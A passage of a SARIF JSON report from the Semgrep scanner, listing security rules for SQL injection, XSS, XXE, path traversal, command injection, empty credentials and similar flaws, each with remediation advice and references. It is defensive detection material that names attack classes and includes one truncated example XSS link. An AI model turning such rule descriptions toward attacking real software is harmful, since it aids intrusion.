Injection')","MEDIUM CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.lang.security.dangerous-exec.dangerous-exec"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"help":{"markdown":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/rust.secrets.sqlx.mysql-connection-empty-password.mysql-connection-empty-password)\n - [https://docs.rs/sqlx/latest/sqlx/](https://docs.rs/sqlx/latest/sqlx/)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"helpUri":"https://semgrep.dev/r/rust.secrets.sqlx.mysql-connection-empty-password.mysql-connection-empty-password","id":"rust.secrets.sqlx.mysql-connection-empty-password.mysql-connection-empty-password","name":"rust.secrets.sqlx.mysql-connection-empty-password.mysql-connection-empty-password","properties":{"precision":"very-high","tags":["CWE-287: Improper Authentication","HIGH CONFIDENCE","OWASP-A02:2017 - Broken Authentication","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: rust.secrets.sqlx.mysql-connection-empty-password.mysql-connection-empty-password"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Cannot determine what '$UNK' is and it is used with a ' which would add the script to the page. Consider allowlisting appropriate values or using an approach which does not involve the URL."},"help":{"markdown":"Detected possible DOM-based XSS. This occurs because a portion of the URL is being used to construct an element added directly to the page. For example, a malicious actor could send someone a link like this: http://www.some.site/page.html?default= which would add the script to the page. Consider allowlisting appropriate values or using an approach which does not involve the URL.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.browser.security.dom-based-xss.dom-based-xss)\n - [https://owasp.org/www-community/attacks/DOM_Based_XSS](https://owasp.org/www-community/attacks/DOM_Based_XSS)\n","text":"Detected possible DOM-based XSS. This occurs because a portion of the URL is being used to construct an element added directly to the page. For example, a malicious actor could send someone a link like this: http://www.some.site/page.html?default= which would add the script to the page. Consider allowlisting appropriate values or using an approach which does not involve the URL."},"helpUri":"https://semgrep.dev/r/javascript.browser.security.dom-based-xss.dom-based-xss","id":"javascript.browser.security.dom-based-xss.dom-based-xss","name":"javascript.browser.security.dom-based-xss.dom-based-xss","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.browser.security.dom-based-xss.dom-based-xss"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Passing unsanitized user input to a Script Engine or other means of dynamic code evaluation is unsafe. This could lead to code injection with data leakage or arbitrary code execution as a result. Avoid this, or use proper sandboxing if user code evaluation is intended."},"help":{"markdown":"Passing unsanitized user input to a Script Engine or other means of dynamic code evaluation is unsafe. This could lead to code injection with data leakage or arbitrary code execution as a result. Avoid this, or use proper sandboxing if user code evaluation is intended.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.servlets.security.tainted-code-injection-from-http-request.tainted-code-injection-from-http-request)\n - [https://cwe.mitre.org/data/definitions/95.html](https://cwe.mitre.org/data/definitions/95.html)\n","text":"Passing unsanitized user input to a Script Engine or other means of dynamic code evaluation is unsafe. This could lead to code injection with data leakage or arbitrary code execution as a result. Avoid this, or use proper sandboxing if user code evaluation is intended."},"helpUri":"https://semgrep.dev/r/java.servlets.security.tainted-code-injection-from-http-request.tainted-code-injection-from-http-request","id":"java.servlets.security.tainted-code-injection-from-http-request.tainted-code-injection-from-http-request","name":"java.servlets.security.tainted-code-injection-from-http-request.tainted-code-injection-from-http-request","properties":{"precision":"very-high","tags":["CWE-95: Improper Neutralization of Directives in Dynamically Evaluated Code ('Eval Injection')","MEDIUM CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: java.servlets.security.tainted-code-injection-from-http-request.tainted-code-injection-from-http-request"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/rust.rocket.sql.sqlx-taint.sqlx-taint)\n - [https://docs.rs/sqlx/latest/sqlx/](https://docs.rs/sqlx/latest/sqlx/)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"helpUri":"https://semgrep.dev/r/rust.rocket.sql.sqlx-taint.sqlx-taint","id":"rust.rocket.sql.sqlx-taint.sqlx-taint","name":"rust.rocket.sql.sqlx-taint.sqlx-taint","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: rust.rocket.sql.sqlx-taint.sqlx-taint"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Found an HTTP server without TLS. Use 'http.ListenAndServeTLS' instead. See https://golang.org/pkg/net/http/#ListenAndServeTLS for more information."},"help":{"markdown":"Found an HTTP server without TLS. Use 'http.ListenAndServeTLS' instead. See https://golang.org/pkg/net/http/#ListenAndServeTLS for more information.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.lang.security.audit.net.use-tls.use-tls)\n - [https://golang.org/pkg/net/http/#ListenAndServeTLS](https://golang.org/pkg/net/http/#ListenAndServeTLS)\n","text":"Found an HTTP server without TLS. Use 'http.ListenAndServeTLS' instead. See https://golang.org/pkg/net/http/#ListenAndServeTLS for more information."},"helpUri":"https://semgrep.dev/r/go.lang.security.audit.net.use-tls.use-tls","id":"go.lang.security.audit.net.use-tls.use-tls","name":"go.lang.security.audit.net.use-tls.use-tls","properties":{"precision":"very-high","tags":["CWE-319: Cleartext Transmission of Sensitive Information","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: go.lang.security.audit.net.use-tls.use-tls"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"help":{"markdown":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/rust.secrets.sqlx.pg-connection-empty-password.pg-connection-empty-password)\n - [https://docs.rs/sqlx/latest/sqlx/](https://docs.rs/sqlx/latest/sqlx/)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"helpUri":"https://semgrep.dev/r/rust.secrets.sqlx.pg-connection-empty-password.pg-connection-empty-password","id":"rust.secrets.sqlx.pg-connection-empty-password.pg-connection-empty-password","name":"rust.secrets.sqlx.pg-connection-empty-password.pg-connection-empty-password","properties":{"precision":"very-high","tags":["CWE-287: Improper Authentication","HIGH CONFIDENCE","OWASP-A02:2017 - Broken Authentication","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: rust.secrets.sqlx.pg-connection-empty-password.pg-connection-empty-password"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"These permissions `$BITS` are widely permissive and grant access to more people than may be necessary. A good default is `0o644` which gives read and write access to yourself and read access to everyone else."},"help":{"markdown":"These permissions `$BITS` are widely permissive and grant access to more people than may be necessary. A good default is `0o644` which gives read and write access to yourself and read access to everyone else.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.security.audit.insecure-file-permissions.insecure-file-permissions)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n","text":"These permissions `$BITS` are widely permissive and grant access to more people than may be necessary. A good default is `0o644` which gives read and write access to yourself and read access to everyone else."},"helpUri":"https://semgrep.dev/r/python.lang.security.audit.insecure-file-permissions.insecure-file-permissions","id":"python.lang.security.audit.insecure-file-permissions.insecure-file-permissions","name":"python.lang.security.audit.insecure-file-permissions.insecure-file-permissions","properties":{"precision":"very-high","tags":["CWE-276: Incorrect Default Permissions","MEDIUM CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.security.audit.insecure-file-permissions.insecure-file-permissions"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In Flask apps, consider using the Werkzeug util `werkzeug.utils.secure_filename()` to sanitize paths and filenames."},"help":{"markdown":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In Flask apps, consider using the Werkzeug util `werkzeug.utils.secure_filename()` to sanitize paths and filenames.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.file.tainted-path-traversal-stdlib-flask.tainted-path-traversal-stdlib-flask)\n - [https://flask.palletsprojects.com/en/2.3.x/patterns/fileuploads/](https://flask.palletsprojects.com/en/2.3.x/patterns/fileuploads/)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n - [https://owasp.org/www-community/attacks/Path_Traversal](https://owasp.org/www-community/attacks/Path_Traversal)\n - [https://portswigger.net/web-security/file-path-traversal](https://portswigger.net/web-security/file-path-traversal)\n - [https://werkzeug.palletsprojects.com/en/3.0.x/utils/#werkzeug.utils.secure_filename](https://werkzeug.palletsprojects.com/en/3.0.x/utils/#werkzeug.utils.secure_filename)\n","text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In Flask apps, consider using the Werkzeug util `werkzeug.utils.secure_filename()` to sanitize paths and filenames."},"helpUri":"https://semgrep.dev/r/python.flask.file.tainted-path-traversal-stdlib-flask.tainted-path-traversal-stdlib-flask","id":"python.flask.file.tainted-path-traversal-stdlib-flask.tainted-path-traversal-stdlib-flask","name":"python.flask.file.tainted-path-traversal-stdlib-flask.tainted-path-traversal-stdlib-flask","properties":{"precision":"very-high","tags":["CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","HIGH CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.file.tainted-path-traversal-stdlib-flask.tainted-path-traversal-stdlib-flask"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.express.db.sqlite-express.sqlite-express)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"helpUri":"https://semgrep.dev/r/javascript.express.db.sqlite-express.sqlite-express","id":"javascript.express.db.sqlite-express.sqlite-express","name":"javascript.express.db.sqlite-express.sqlite-express","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.express.db.sqlite-express.sqlite-express"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. It is our recommendation to secure this parser against XXE attacks by configuring $FACTORY with `$FACTORY.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks. `$FACTORY.setExpandEntityReferences(false)` `$FACTORY.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)` `$FACTORY.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")` `$FACTORY.setFeature(\"http://xml.org/sax/features/external-general-entities\", false)`. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"help":{"markdown":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. It is our recommendation to secure this parser against XXE attacks by configuring $FACTORY with `$FACTORY.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks. `$FACTORY.setExpandEntityReferences(false)` `$FACTORY.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)` `$FACTORY.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")` `$FACTORY.setFeature(\"http://xml.org/sax/features/external-general-entities\", false)`. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/kotlin.xxe.documentbuilderfactory-xxe.documentbuilderfactory-xxe)\n - [https://blog.sonarsource.com/secure-xml-processor/](https://blog.sonarsource.com/secure-xml-processor/)\n - [https://blog.sonarsource.com/understanding-xxe-vulnerabilities/](https://blog.sonarsource.com/understanding-xxe-vulnerabilities/)\n - [https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html)\n - [https://cwe.mitre.org/data/definitions/776.html](https://cwe.mitre.org/data/definitions/776.html)\n - [https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E](https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E)\n - [https://github.com/returntocorp/java-xxe-research](https://github.com/returntocorp/java-xxe-research)\n - [https://owasp.org/Top10/A05_2021-Security_Misconfiguration](https://owasp.org/Top10/A05_2021-Security_Misconfiguration)\n - [https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755](https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755)\n - [https://semgrep.dev/blog/2022/xml-security-in-java](https://semgrep.dev/blog/2022/xml-security-in-java)\n - [https://semgrep.dev/docs/cheat-sheets/java-xxe/](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n","text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. It is our recommendation to secure this parser against XXE attacks by configuring $FACTORY with `$FACTORY.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks. `$FACTORY.setExpandEntityReferences(false)` `$FACTORY.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)` `$FACTORY.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")` `$FACTORY.setFeature(\"http://xml.org/sax/features/external-general-entities\", false)`. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"helpUri":"https://semgrep.dev/r/kotlin.xxe.documentbuilderfactory-xxe.documentbuilderfactory-xxe","id":"kotlin.xxe.documentbuilderfactory-xxe.documentbuilderfactory-xxe","name":"kotlin.xxe.documentbuilderfactory-xxe.documentbuilderfactory-xxe","properties":{"precision":"very-high","tags":["CWE-776: Improper Restriction of Recursive Entity References in DTDs ('XML Entity Expansion')","MEDIUM CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: kotlin.xxe.documentbuilderfactory-xxe.documentbuilderfactory-xxe"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"MemoryMarshal.CreateSpan and MemoryMarshal.CreateReadOnlySpan should be used with caution, as the length argument is not checked."},"help":{"markdown":"MemoryMarshal.CreateSpan and MemoryMarshal.CreateReadOnlySpan should be used with caution, as the length argument is not checked.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.lang.security.memory.memory-marshal-create-span.memory-marshal-create-span)\n - [https://docs.microsoft.com/en-us/dotnet/api/system.runtime.interopservices.memorymarshal.createspan?view=net-6.0](https://docs.microsoft.com/en-us/dotnet/api/system.runtime.interopservices.memorymarshal.createspan?view=net-6.0)\n - [https://docs.microsoft.com/en-us/dotnet/api/system.runtime.interopservices.memorymarshal.createreadonlyspan?view=net-6.0](https://docs.microsoft.com/en-us/dotnet/api/system.runtime.interopservices.memorymarshal.createreadonlyspan?view=net-6.0)\n","text":"MemoryMarshal.CreateSpan and MemoryMarshal.CreateReadOnlySpan should be used with caution, as the length argument is not checked."},"helpUri":"https://semgrep.dev/r/csharp.lang.security.memory.memory-marshal-create-span.memory-marshal-create-span","id":"csharp.lang.security.memory.memory-marshal-create-span.memory-marshal-create-span","name":"csharp.lang.security.memory.memory-marshal-create-span.memory-marshal-create-span","properties":{"precision":"very-high","tags":["CWE-125: Out-of-bounds Read","LOW CONFIDENCE","OWASP-A04:2021 - Insecure Design","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.lang.security.memory.memory-marshal-create-span.memory-marshal-create-span"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"help":{"markdown":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/rust.secrets.postgres.hardcoded-connection-empty-password.hardcoded-connection-empty-password)\n - [https://docs.rs/postgres/latest/postgres/](https://docs.rs/postgres/latest/postgres/)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"helpUri":"https://semgrep.dev/r/rust.secrets.postgres.hardcoded-connection-empty-password.hardcoded-connection-empty-password","id":"rust.secrets.postgres.hardcoded-connection-empty-password.hardcoded-connection-empty-password","name":"rust.secrets.postgres.hardcoded-connection-empty-password.hardcoded-connection-empty-password","properties":{"precision":"very-high","tags":["CWE-287: Improper Authentication","HIGH CONFIDENCE","OWASP-A02:2017 - Broken Authentication","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: rust.secrets.postgres.hardcoded-connection-empty-password.hardcoded-connection-empty-password"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands."},"help":{"markdown":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.cherrypy.os.tainted-os-command-stdlib-cherrypy.tainted-os-command-stdlib-cherrypy)\n - [https://docs.cherrypy.dev/en/latest/tutorials.html](https://docs.cherrypy.dev/en/latest/tutorials.html)\n - [https://docs.python.org/3/library/os.html](https://docs.python.org/3/library/os.html)\n - [https://docs.python.org/3/library/subprocess.html#subprocess.Popen](https://docs.python.org/3/library/subprocess.html#subprocess.Popen)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n - [https://semgrep.dev/docs/cheat-sheets/python-command-injection/](https://semgrep.dev/docs/cheat-sheets/python-command-injection/)\n - [https://stackless.readthedocs.io/en/v2.7.16-slp/library/commands.html](https://stackless.readthedocs.io/en/v2.7.16-slp/library/commands.html)\n","text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands."},"helpUri":"https://semgrep.dev/r/python.cherrypy.os.tainted-os-command-stdlib-cherrypy.tainted-os-command-stdlib-cherrypy","id":"python.cherrypy.os.tainted-os-command-stdlib-cherrypy.tainted-os-command-stdlib-cherrypy","name":"python.cherrypy.os.tainted-os-command-stdlib-cherrypy.tainted-os-command-stdlib-cherrypy","properties":{"precision":"very-high","tags":["CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.cherrypy.os.tainted-os-command-stdlib-cherrypy.tainted-os-command-stdlib-cherrypy"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected a template variable used in a script tag. Although template variables are HTML escaped, HTML escaping does not always prevent cross-site scripting (XSS) attacks when used directly in JavaScript. If you need to do this, use `escape_javascript` or its alias, `j`. However, this will not protect from XSS in all circumstances; see the references for more information. Consider placing this value in the HTML portion (outside of a script tag)."},"help":{"markdown":"Detected a template variable used in a script tag. Although template variables are HTML escaped, HTML escaping does not always prevent cross-site scripting (XSS) attacks when used directly in JavaScript. If you need to do this, use `escape_javascript` or its alias, `j`. However, this will not protect from XSS in all circumstances; see the references for more information. Consider placing this value in the HTML portion (outside of a script tag).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.rails.security.audit.xss.templates.var-in-script-tag.var-in-script-tag)\n - [https://www.netsparker.com/blog/web-security/preventing-xss-ruby-on-rails-web-applications/](https://www.netsparker.com/blog/web-security/preventing-xss-ruby-on-rails-web-applications/)\n - [https://www.youtube.com/watch?v=yYTkLUEdIyE](https://www.youtube.com/watch?v=yYTkLUEdIyE)\n - [https://www.veracode.com/blog/secure-development/nodejs-template-engines-why-default-encoders-are-not-enough](https://www.veracode.com/blog/secure-development/nodejs-template-engines-why-default-encoders-are-not-enough)\n","text":"Detected a template variable used in a script tag. Although template variables are HTML escaped, HTML escaping does not always prevent cross-site scripting (XSS) attacks when used directly in JavaScript. If you need to do this, use `escape_javascript` or its alias, `j`. However, this will not protect from XSS in all circumstances; see the references for more information. Consider placing this value in the HTML portion (outside of a script tag)."},"helpUri":"https://semgrep.dev/r/ruby.rails.security.audit.xss.templates.var-in-script-tag.var-in-script-tag","id":"ruby.rails.security.audit.xss.templates.var-in-script-tag.var-in-script-tag","name":"ruby.rails.security.audit.xss.templates.var-in-script-tag.var-in-script-tag","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.rails.security.audit.xss.templates.var-in-script-tag.var-in-script-tag"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"OWASP guidance recommends disabling tracing for production applications to prevent accidental leakage of sensitive application information."},"help":{"markdown":"OWASP guidance recommends disabling tracing for production applications to prevent accidental leakage of sensitive application information.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.dotnet.security.net-webconfig-trace-enabled.net-webconfig-trace-enabled)\n - [https://cheatsheetseries.owasp.org/cheatsheets/DotNet_Security_Cheat_Sheet.html#asp-net-web-forms-guidance](https://cheatsheetseries.owasp.org/cheatsheets/DotNet_Security_Cheat_Sheet.html#asp-net-web-forms-guidance)\n - [https://msdn.microsoft.com/en-us/library/e8z01xdh.aspx](https://msdn.microsoft.com/en-us/library/e8z01xdh.aspx)\n","text":"OWASP guidance recommends disabling tracing for production applications to prevent accidental leakage of sensitive application information."},"helpUri":"https://semgrep.dev/r/csharp.dotnet.security.net-webconfig-trace-enabled.net-webconfig-trace-enabled","id":"csharp.dotnet.security.net-webconfig-trace-enabled.net-webconfig-trace-enabled","name":"csharp.dotnet.security.net-webconfig-trace-enabled.net-webconfig-trace-enabled","properties":{"precision":"very-high","tags":["CWE-1323: Improper Management of Sensitive Trace Data","LOW CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.dotnet.security.net-webconfig-trace-enabled.net-webconfig-trace-enabled"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected user input flowing into an HTML response. You may be accidentally bypassing secure methods of rendering HTML by manually constructing 